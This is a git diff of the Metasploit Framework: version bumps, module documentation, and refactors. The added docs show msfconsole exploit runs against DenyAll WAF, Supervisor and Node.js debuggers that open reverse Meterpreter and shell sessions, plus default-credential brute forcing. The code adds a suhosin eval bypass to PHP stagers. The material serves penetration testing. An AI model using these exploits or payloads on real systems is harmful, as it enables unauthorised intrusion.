diff --git a/.ruby-version b/.ruby-version index 005119baaa..8e8299dcc0 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.4.1 +2.4.2 diff --git a/.travis.yml b/.travis.yml index 28f0b510f7..8cafcfe853 100644 --- a/.travis.yml +++ b/.travis.yml @@ -12,8 +12,8 @@ addons: language: ruby rvm: - '2.2' - - '2.3.4' - - '2.4.1' + - '2.3.5' + - '2.4.2' env: - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' diff --git a/Dockerfile b/Dockerfile index 141513bdb7..1bf0d1c27c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM ruby:2.4.1-alpine +FROM ruby:2.4.2-alpine MAINTAINER Rapid7 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" diff --git a/Gemfile.lock b/Gemfile.lock index 33e3b69bce..b186ee55ad 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.8) + metasploit-framework (4.16.9) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.7) + metasploit-payloads (= 1.3.8) metasploit_data_models metasploit_payloads-mettle (= 0.2.2) msgpack @@ -150,7 +150,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.7) + metasploit-payloads (1.3.8) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -163,7 +163,7 @@ GEM recog (~> 2.0) metasploit_payloads-mettle (0.2.2) method_source (0.8.2) - mini_portile2 (2.2.0) + mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) multipart-post (2.0.0) @@ -171,8 +171,8 @@ GEM net-ssh (4.2.0) network_interface (0.0.2) nexpose (7.0.1) - nokogiri (1.8.0) - mini_portile2 (~> 2.2.0) + nokogiri (1.8.1) + mini_portile2 (~> 2.3.0) octokit (4.7.0) sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) @@ -193,10 +193,9 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.10.4) + pry (0.11.0) coderay (~> 1.1.0) method_source (~> 0.8.1) - slop (~> 3.4) public_suffix (3.0.0) rack (1.6.8) rack-test (0.6.3) @@ -308,7 +307,6 @@ GEM json (>= 1.8, < 3) simplecov-html (~> 0.10.0) simplecov-html (0.10.2) - slop (3.6.0) sqlite3 (1.3.13) sshkey (1.9.0) thor (0.20.0) diff --git a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md new file mode 100644 index 0000000000..0402f34ef0 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md @@ -0,0 +1,59 @@ +## Description + +This module allows you to authenticate to Inedo BuildMaster, an application release automation tool. +The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution. + +## Vulnerable Application + +[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide) + +[Inedo website](http://inedo.com/) + +## Verification Steps + +1. Do: ```use auxiliary/scanner/http/buildmaster_login``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: Set credentials +5. Do: ```run``` +6. You should see the module attempting to log in. + +## Scenarios + +### Attempt to login with the default credentials. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` + +### Brute force with credentials from file. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt +USERPASS_FILE => ~/BuildMasterCreds.txt +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` diff --git a/documentation/modules/auxiliary/scanner/smb/smb1.md b/documentation/modules/auxiliary/scanner/smb/smb1.md new file mode 100644 index 0000000000..17c30c3a8a --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb1.md @@ -0,0 +1,55 @@ +# Description +This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects: +```PC NETWORK PROGRAM 1.0 +LANMAN1.0 +Windows for Workgroups 3.1a +LM1.2X002 +LANMAN2.1 +NT LM 0.12 +``` +If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected. +If the SMB server does not support SMBv1 a RST will be sent. + +___ +# Usage + +The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not. + +#### A host that does support SMBv1. + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS x.x.x.x +RHOSTS => x.x.x.x +msf auxiliary(smb1) > run + +[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect. +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb1) > services -S x.x.x.x + +Services +======== + +host port proto name state info +---- ---- ----- ---- ----- ---- +x.x.x.x 445 tcp smb1 open +``` + +#### A host that does not support SMBv1 + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf auxiliary(smb1) > set RHOSTS y.y.y.y +RHOSTS => y.y.y.y +msf auxiliary(smb1) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` +___ + + +## Options + +The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```. \ No newline at end of file diff --git a/documentation/modules/exploit/linux/http/denyall_waf_exec.md b/documentation/modules/exploit/linux/http/denyall_waf_exec.md new file mode 100644 index 0000000000..c41efa6ae1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/denyall_waf_exec.md @@ -0,0 +1,47 @@ +## Vulnerable Application + +This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user. + +It's possible to have trial demo for 15 days at Amazon Marketplace. +[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911) + +You just need to follow instruction above URL. + +## Verification Steps + +A successful check of the exploit will look like this: + +- [ ] Start `msfconsole` +- [ ] `use use exploit/linux/http/denyall_exec` +- [ ] Set `RHOST` +- [ ] Set `LHOST` +- [ ] Run `check` +- [ ] **Verify** that you are seeing `The target appears to be vulnerable.` +- [ ] Run `exploit` +- [ ] **Verify** that you are seeing `iToken` value extraction. +- [ ] **Verify** that you are getting `meterpreter` session. + +## Scenarios + +``` +msf > use exploit/linux/http/denyall_exec +msf exploit(denyall_exec) > +msf exploit(denyall_exec) > set RHOST 35.176.123.128 +RHOST => 35.176.123.128 +msf exploit(denyall_exec) > set LHOST 35.12.3.3 +LHOST => 35.12.3.3 +msf exploit(denyall_exec) > check +[*] 35.176.123.128:3001 The target appears to be vulnerable. +msf exploit(denyall_exec) > exploit + +[*] Started reverse TCP handler on 35.12.3.3:4444 +[*] Extracting iToken value from unauthenticated accessible endpoint. +[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a +[*] Trigerring command injection vulnerability with iToken value. +[*] Sending stage (40411 bytes) to 35.176.123.128 +[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300 + +meterpreter > pwd +/var/log/denyall/reverseproxy +meterpreter > +``` \ No newline at end of file diff --git a/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md new file mode 100644 index 0000000000..8b63cf55ec --- /dev/null +++ b/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md @@ -0,0 +1,78 @@ +## Vulnerable Application + + This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2 + + This has been tested with versions 3.2.0 and 3.3.2 + +### Creating A Testing Environment + + At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories. + + 1. ```sudo apt-get install supervisor``` + 2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf` + + ``` + [inet_http_server] ; inet (TCP) server disabled by default + port=:9001 ; ip_address:port specifier, *:port for all iface + username=user ; default is no username (open server) + password=123 ; default is no password (open server) + ``` + + 3. Restart the service: `sudo service supervisor restart` + +## Verification Steps + + 1. ```use exploit/linux/http/supervisor_xmlrpc_exec``` + 2. ```set lhost [IP]``` + 3. ```set rhost [IP]``` + 4. ```set httpusername user``` + 5. ```set httppassword 123``` + 6. ```exploit``` + 7. A meterpreter session should have been opened successfully + +## Options + + **HttpUsername** + + Username for HTTP basic auth which is set in the conf file(optional) + + **HttpPassword** + + Password for HTTP basic auth which is set in the conf file(optional) + + **TARGETURI** + + The path to the XML-RPC endpoint + +## Scenarios + +### Supervisor 3.2.0 on Xubuntu 16.04 + +``` +msf > use exploit/linux/http/supervisor_xmlrpc_exec +msf exploit(supervisor_xmlrpc_exec) > set httpusername user +httpusername => user +msf exploit(supervisor_xmlrpc_exec) > set httppassword 123 +httppassword => 123 +msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2 +lhost => 192.168.0.2 +msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19 +rhost => 192.168.0.19 +msf exploit(supervisor_xmlrpc_exec) > check + +[*] Extracting version from web interface.. +[*] Using basic auth (user:123) +[+] Vulnerable version found: 3.2.0 +[*] 192.168.0.19:9001 The target appears to be vulnerable. +msf exploit(supervisor_xmlrpc_exec) > exploit + +[*] Started reverse TCP handler on 192.168.0.2:4444 +[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2 +[*] Using basic auth (user:123) +[*] Sending stage (2878872 bytes) to 192.168.0.19 +[*] Command Stager progress - 100.00% done (782/782 bytes) +[+] Request timeout, usually indicates success. Passing to handler.. +[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100 + +meterpreter > +``` diff --git a/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md new file mode 100644 index 0000000000..1d699fd6b9 --- /dev/null +++ b/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md @@ -0,0 +1,64 @@ +## Vulnerable Application + +Current and historical versions of node (or any JS env based on the +V8 JS engine) have this functionality and could be exploitable if +configured to expose the JS port on an untrusted interface. + +Install a version of node using any of the normal methods: +* Vendor: https://nodejs.org/en/download/package-manager/ +* Distro: `sudo apt-get install nodejs` + +Alternately, use standard node docker containers as targets: +``` +$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858 +``` +(Others at https://hub.docker.com/_/node/) + +Tested on Node 7.x, 6.x, 4.x + +## Verification Steps + +1. Run a node process exposing the debug port +``` +node --debug=0.0.0.0:5858 +``` + +2. Exploit it and catch the callback: + +``` +msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit +``` +(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container) + +Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity +(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start. + + +## Scenarios + +### Example Run (Node 7.x) + +Victim: +``` +$ node --version +v7.10.0 +$ node --debug=0.0.0.0:5858 +(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead. +Debugger listening on 0.0.0.0:5858 +> +(To exit, press ^C again or type .exit) +``` + +Attacker: +``` +msf exploit(nodejs_v8_debugger) > exploit + +[*] Started reverse TCP handler on 10.0.0.141:4444 +[*] 127.0.0.1:5858 - Sending 745 byte payload... +[*] 127.0.0.1:5858 - Got success response +[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700 + +id +(redacted) +``` + diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index b0cba5316a..96d0b07868 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.8" + VERSION = "4.16.9" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 2be86ab444..09c8a97eff 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -3,30 +3,74 @@ require 'shellwords' module Msf -module Sessions -module MeterpreterOptions + module Sessions + # + # Defines common options across all Meterpreter implementations + # + module MeterpreterOptions - def initialize(info = {}) - super(info) + TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week + TIMEOUT_COMMS = 300 # 5 minutes + TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour + TIMEOUT_RETRY_WAIT = 10 # 10 seconds - register_advanced_options( - [ - OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]), - OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]), - OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]), - OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']), - OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']), - OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]), - OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]), - OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]), - OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]), - OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]), - OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]), - OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS]) - ], self.class) + def initialize(info = {}) + super(info) + + register_advanced_options( + [ + OptBool.new( + 'AutoLoadStdapi', + [true, "Automatically load the Stdapi extension", true] + ), + OptBool.new( + 'AutoVerifySession', + [true, "Automatically verify and drop invalid sessions", true] + ), + OptInt.new( + 'AutoVerifySessionTimeout', + [false, "Timeout period to wait for session validation to occur, in seconds", 30] + ), + OptString.new( + 'InitialAutoRunScript', + [false, "An initial script to run on session creation (before AutoRunScript)", ''] + ), + OptString.new( + 'AutoRunScript', + [false, "A script to run automatically on session creation.", ''] + ), + OptBool.new( + 'AutoSystemInfo', + [true, "Automatically capture system information on initialization.", true] + ), + OptBool.new( + 'EnableUnicodeEncoding', + [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows] + ), + OptPath.new( + 'HandlerSSLCert', + [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"] + ), + OptInt.new( + 'SessionRetryTotal', + [false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL] + ), + OptInt.new( + 'SessionRetryWait', + [false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT] + ), + OptInt.new( + 'SessionExpirationTimeout', + [ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION] + ), + OptInt.new( + 'SessionCommunicationTimeout', + [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS] + ) + ], + self.class + ) + end + end end - end -end -end - diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index 206b0364c7..f938620420 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -10,12 +10,12 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param pass [String] Password # @param redirect URL [String] to redirect after successful login # @return [Hash] The post data for vars_post Parameter - def wordpress_helper_login_post_data(user, pass, redirect=nil) + def wordpress_helper_login_post_data(user, pass, redirect = nil) post_data = { - 'log' => user.to_s, - 'pwd' => pass.to_s, - 'redirect_to' => redirect.to_s, - 'wp-submit' => 'Login' + 'log' => user.to_s, + 'pwd' => pass.to_s, + 'redirect_to' => redirect.to_s, + 'wp-submit' => 'Login' } post_data end @@ -31,23 +31,23 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [String,nil] The location of the new comment/post, nil on error def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url) vars_post = { - 'comment' => comment, - 'submit' => 'Post+Comment', - 'comment_post_ID' => comment_post_id.to_s, - 'comment_parent' => '0' + 'comment' => comment, + 'submit' => 'Post+Comment', + 'comment_post_ID' => comment_post_id.to_s, + 'comment_parent' => '0' } vars_post.merge!({ - 'author' => author, - 'email' => email, - 'url' => url, + 'author' => author, + 'email' => email, + 'url' => url }) unless login_cookie options = { - 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), - 'method' => 'POST' + 'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'), + 'method' => 'POST' } - options.merge!({'vars_post' => vars_post}) - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'vars_post' => vars_post }) + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) @@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found # @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user # @return [Integer,nil] The post id, nil when nothing found - def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) + def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil) range.each { |id| vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) @@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @param comments_enabled [Boolean] Check if comments are enabled on this post # @param login_cookie [String] A valid login cookie to perform the check as an authenticated user # @return [String,nil] the HTTP response body of the post, nil otherwise - def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil) + def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil) options = { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => uri } - options.merge!({'cookie' => login_cookie}) if login_cookie + options.merge!({ 'cookie' => login_cookie }) if login_cookie res = send_request_cgi(options) # post exists - if res and res.code == 200 + if res && res.code == 200 # also check if comments are enabled if comments_enabled if res.body =~ /form.*action.*wp-comments-post\.php/ @@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # # @param cookie [String] A valid admin session cookie # @return [String,nil] The nonce, nil on error - def wordpress_helper_get_plugin_upload_nonce(cookie) - uri = normalize_uri(wordpress_url_backend, 'plugin-install.php') + def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil) + uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php') options = { 'method' => 'GET', 'uri' => uri, @@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers res = send_request_cgi(options) if res && res.code == 200 return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1] + elsif res && res.redirect? && res.redirection + path = wordpress_helper_parse_location_header(res) + return wordpress_helper_get_plugin_upload_nonce(cookie, path) end end end diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb index bb7d04ae8b..cddbee7108 100644 --- a/lib/msf/core/payload/apk.rb +++ b/lib/msf/core/payload/apk.rb @@ -41,7 +41,10 @@ class Msf::Payload::Apk application = amanifest.xpath('//application') application_name = application.attribute("name") if application_name - return application_name.to_s + application_str = application_name.to_s + unless application_str == 'android.app.Application' + return application_str + end end activities = amanifest.xpath("//activity|//activity-alias") for activity in activities @@ -221,7 +224,7 @@ class Msf::Payload::Apk FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") package = amanifest.xpath("//manifest").first['package'] - package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" + package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}" classes = {} classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index cc7fbc7b02..d630bf749e 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -31,7 +31,7 @@ module Payload::Linux::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb index 4756ce810d..7dac6fe441 100644 --- a/lib/msf/core/payload/php/bind_tcp.rb +++ b/lib/msf/core/payload/php/bind_tcp.rb @@ -109,7 +109,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb index aa480610c6..5cc7daae8c 100644 --- a/lib/msf/core/payload/php/reverse_tcp.rb +++ b/lib/msf/core/payload/php/reverse_tcp.rb @@ -102,7 +102,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 63b9a5d651..8945ded6bb 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -35,7 +35,7 @@ module Payload::Windows::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb index d8cdbddb97..37657ddc8a 100644 --- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index 46f7c0b744..f55de65339 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/post/unix.rb b/lib/msf/core/post/unix.rb index b09425f198..37637f147e 100644 --- a/lib/msf/core/post/unix.rb +++ b/lib/msf/core/post/unix.rb @@ -40,14 +40,17 @@ module Msf::Post::Unix # def get_groups groups = [] - cmd_out = read_file("/etc/group").split("\n") - cmd_out.each do |l| - entry = {} - user_field = l.split(":") - entry[:name] = user_field[0] - entry[:gid] = user_field[2] - entry[:users] = user_field[3] - groups << entry + group = '/etc/group' + if file_exist?(group) + cmd_out = read_file(group).split("\n") + cmd_out.each do |l| + entry = {} + user_field = l.split(":") + entry[:name] = user_field[0] + entry[:gid] = user_field[2] + entry[:users] = user_field[3] + groups << entry + end end return groups end @@ -59,8 +62,11 @@ module Msf::Post::Unix user_dirs = [] # get all user directories from /etc/passwd - read_file("/etc/passwd").each_line do |passwd_line| - user_dirs << passwd_line.split(/:/)[5] + passwd = '/etc/passwd' + if file_exist?(passwd) + read_file(passwd).each_line do |passwd_line| + user_dirs << passwd_line.split(/:/)[5] + end end # also list other common places for home directories in the event that diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index 6f4c26c074..c6c07ef26e 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -66,23 +66,26 @@ module Msf end def cmd_edit_help - msg = "Edit the currently active module" - msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}." - print_line "Usage: edit" + print_line "Usage: edit [file/to/edit.rb]" print_line - print_line msg - print_line "When done editing, you must reload the module with 'reload' or 'rerun'." + print_line "Edit a local file or the currently active module with #{local_editor}" + print_line "If a file path is specified it will automatically be reloaded after editing" + print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'." print_line end # # Edit the currently active module # - def cmd_edit - if active_module - editor = local_editor - path = active_module.file_path + def cmd_edit(*args) + if args.length > 0 + path = args[0] + elsif active_module + path = active_module.file_path + end + if path + editor = local_editor if editor.nil? editor = 'vim' print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.") @@ -90,6 +93,10 @@ module Msf print_status("Launching #{editor} #{path}") system(editor, path) + + if args.length > 0 + load args[0] + end else print_error('Nothing to edit -- try using a module first.') end diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 329924f038..69d509ef89 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -34,24 +34,12 @@ module Meterpreter ### class ClientCore < Extension - UNIX_PATH_MAX = 108 - DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock" - - METERPRETER_TRANSPORT_SSL = 0 - METERPRETER_TRANSPORT_HTTP = 1 - METERPRETER_TRANSPORT_HTTPS = 2 - - TIMEOUT_SESSION = 24*3600*7 # 1 week - TIMEOUT_COMMS = 300 # 5 minutes - TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour - TIMEOUT_RETRY_WAIT = 10 # 10 seconds - - VALID_TRANSPORTS = { - 'reverse_tcp' => METERPRETER_TRANSPORT_SSL, - 'reverse_http' => METERPRETER_TRANSPORT_HTTP, - 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, - 'bind_tcp' => METERPRETER_TRANSPORT_SSL - } + VALID_TRANSPORTS = [ + 'reverse_tcp', + 'reverse_http', + 'reverse_https', + 'bind_tcp' + ] include Rex::Payloads::Meterpreter::UriChecksum @@ -577,46 +565,12 @@ class ClientCore < Extension raise RuntimeError, 'Cannot migrate into current process', caller end - if client.platform == 'linux' - if writable_dir.to_s.strip.empty? - writable_dir = tmp_folder - end - - stat_dir = client.fs.filestat.new(writable_dir) - - unless stat_dir.directory? - raise RuntimeError, "Directory #{writable_dir} not found", caller - end - # Rex::Post::FileStat#writable? isn't available - end - migrate_stub = generate_migrate_stub(target_process) migrate_payload = generate_migrate_payload(target_process) # Build the migration request request = Packet.create_request('core_migrate') - if client.platform == 'linux' - socket_path = File.join(writable_dir, 